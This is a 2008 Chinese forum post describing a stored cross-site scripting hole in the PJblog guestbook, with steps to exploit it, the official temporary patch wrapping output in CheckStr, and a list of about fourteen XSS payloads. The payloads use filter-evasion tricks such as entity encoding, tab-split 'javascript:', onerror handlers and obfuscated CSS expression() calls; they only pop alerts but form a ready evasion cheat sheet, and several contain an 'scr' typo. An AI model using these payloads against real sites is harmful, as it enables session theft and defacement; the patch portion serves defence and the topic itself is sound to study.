找回密码
 开放注册

QQ登录

只需一步,快速开始

微信登录

微信扫码,快速开始

搜索
查看: 928|回复: 0

最新跨站代码

[复制链接]

18

主题

24

回帖

56

牛毛

初生牛犊

jsedy

积分
56
发表于 2008-7-5 13:12:46 | 显示全部楼层 |阅读模式 来自 广东省深圳市
PJblog最新跨站代码

随便找个PJBLOG 然后注册个用户..

登陆后 进入留言本

输入留言 记得在保密的地方那个框框 要勾上..

留言代码可以是这样:

xixi
当然 大家自由发挥还是更好..

官方论坛提供的暂时修正方法:

如果不用屏蔽关键字的办法。则使用下面的办法修补漏洞

打开 guestbook.asp 搜索

<%=UBBCode(HtmlEncode(GuestDB(\"book_Content\")),0,GBSet.getKeyValue(\"ubbCode\"),GBSet.getKeyValue(\"ImgCode\"),GBSet.getKeyValue(\"autoURL\"),1)%>
改为:
<%=CheckStr(UBBCode(HtmlEncode(GuestDB(\"book_Content\")),0,GBSet.getKeyValue(\"ubbCode\"),GBSet.getKeyValue(\"ImgCode\"),GBSet.getKeyValue(\"autoURL\"),1))%>

打开 cls_article.asp 搜索

<%=UBBCode(HtmlEncode(blog_CommContent),commArr(4,Pcount),blog_commUBB,blog_commIMG,commArr(7,Pcount),commArr(9,Pcount))%>
改为:
<%=CheckStr(UBBCode(HtmlEncode(blog_CommContent),commArr(4,Pcount),blog_commUBB,blog_commIMG,commArr(7,Pcount),commArr(9,Pcount)))%>

本篇文章来源于 xixi&#39;s blog:http://www.wairi.cn 
原文链接:http://www.wairi.cn/article.asp?id=949






<script>alert(\"跨站\")</script>  (最常用)
<img scr=javascript:alert(\"跨站\")></img>
<img scr=\"javascrip&#116&#58 alert(/跨站/)></img>
<img scr=\"javas????cript:alert(/跨站/)\" width=150></img> (?用tab键弄出来的空格)
<img scr=\"#\" onerror=alert(/跨站/)></img>
<img scr=\"#\" style=\"xss:expression(alert(/xss/));\"></img>
<img scr=\"#\"/* */onerror=alert(/xss/) width=150></img> (/**/ 表示注释)
<img src=vbscript:msgbox (\"xss\")></img>
<style> input {left:expression (alert(&#39;xss&#39;))}</style>
<div style={left:expression (alert(&#39;xss&#39;))}></div>
<div style={left:exp/* */ression (alert(&#39;xss&#39;))}></div>
<div style={left:\\0065\\0078ression (alert(&#39;xss&#39;))}></div>
html 实体 <div style={left:&#x0065;xpression (alert(&#39;xss&#39;))}></div>
unicode <div style=\"{left:expRessioN (alert(&#39;xss&#39;))}\">
您需要登录后才可以回帖 登录 | 开放注册

本版积分规则

帮助|Archiver|小黑屋|通信管理局专项备案号:[2008]238号|NB5用户社区 ( 皖ICP备08004151号;皖公网安备34010402700514号 )

GMT+8, 2025-1-12 13:39 , Processed in 0.115243 second(s), 23 queries , Yac On.

Powered by Discuz! X3.5

快速回复 返回顶部 返回列表